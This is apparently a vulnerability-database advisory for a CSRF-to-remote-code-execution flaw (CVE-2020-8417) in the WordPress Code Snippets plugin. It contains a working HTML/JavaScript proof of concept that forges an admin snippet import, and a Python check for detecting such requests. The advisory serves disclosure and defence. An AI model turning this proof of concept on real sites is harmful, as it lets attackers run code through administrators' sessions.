Code Snippets < 2.14.0 - CSRF to RCE



Description
This "flaw allowed anybody to forge a request on behalf of an administrator and inject executable code on a vulnerable site."
Proof of Concept
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/waftesting.vhx.cloud:8080\/wp-admin\/admin.php?page=import-snippets", true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryIpMt0484nyfHOSdA");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"duplicate_action\"\r\n" + 
          "\r\n" + 
          "ignore\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"code_snippets_import_files[]\"; filename=\"code-snippets (2).json\"\r\n" + 
          "Content-Type: application/json\r\n" + 
          "\r\n" + 
          "{\"generator\":\"Code Snippets v2.13.3\",\"date_created\":\"2020-01-23 15:07\",\"snippets\":[{\"name\":\"PoC\",\"scope\":\"global\",\"code\":\"MALICIOUS CODE HERE\",\"priority\":\"1\",\"active\":\"1\"}]}\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "save\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"max_file_size\"\r\n" + 
          "\r\n" + 
          "2097152\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload files and import\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
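
Defender-side check, added here as an example (not code from the plugin or from the original entry): it inspects a captured request to the import page used above and reports the traits the proof of concept shows, namely a foreign origin, no nonce field among the form fields, and an imported snippet marked active. The function names are hypothetical, `_wpnonce` is assumed as the nonce field because it is WordPress's default name, and headers are assumed to arrive as a dict with canonical names.

```python
import json
from email import message_from_bytes
from urllib.parse import parse_qs, urlsplit

NONCE_FIELD = "_wpnonce"  # assumption: WordPress's default nonce field name

def parse_multipart(content_type, body):
    """Return ({field: value}, [uploaded file bytes]) for a multipart/form-data body."""
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    parts = msg.get_payload() if msg.is_multipart() else []
    fields, files = {}, []
    for part in parts:
        name = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        if part.get_filename():
            files.append(data)
        else:
            fields[name] = data.decode(errors="replace").strip()
    return fields, files

def assess_import_request(method, url, headers, body, site_origin):
    """Return the reasons a request looks like a forged snippet import ([] if none)."""
    target = urlsplit(url)
    if (method != "POST" or not target.path.endswith("/wp-admin/admin.php")
            or parse_qs(target.query).get("page") != ["import-snippets"]):
        return []
    findings = []
    sender = urlsplit(headers.get("Origin") or headers.get("Referer", ""))
    if f"{sender.scheme}://{sender.netloc}" != site_origin:
        findings.append("origin-mismatch")  # also raised when both headers are absent
    fields, files = parse_multipart(headers.get("Content-Type", ""), body)
    if not fields.get(NONCE_FIELD):
        findings.append("missing-nonce")
    for raw in files:
        try:
            snippets = json.loads(raw).get("snippets") or []
            active = any(isinstance(s, dict) and str(s.get("active")) == "1" for s in snippets)
        except (ValueError, AttributeError, TypeError):
            continue  # not a snippet export; nothing to report for this file
        if active:
            findings.append("imports-active-snippet")
    return findings

BOUNDARY = "x-example"  # constructed sample shaped like the proof-of-concept request
SAMPLE_BODY = (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="action"\r\n\r\nsave\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="code_snippets_import_files[]"; '
    'filename="s.json"\r\nContent-Type: application/json\r\n\r\n'
    '{"snippets":[{"code":"/* placeholder */","active":"1"}]}' f"\r\n--{BOUNDARY}--\r\n").encode()
SAMPLE_HEADERS = {"Origin": "http://other.example",
                  "Content-Type": f"multipart/form-data; boundary={BOUNDARY}"}
```

A same-origin import that carries a nonce still reports `imports-active-snippet`, so treat that finding as context for the other two rather than as an alert on its own.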

Affects Plugin

fixed in version 2.14.0

References

CVE 2020-8417
URL https://www.wordfence.com/blog/2020/01/high-severity-csrf-to-rce-vulnerability-patched-in-code-snippets-plugin/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Verified No
WPVDB ID 10050

Timeline

Publicly Published 2020-01-29 (4 months ago)
Added 2020-01-29 (4 months ago)
Last Updated 2020-01-30 (4 months ago)
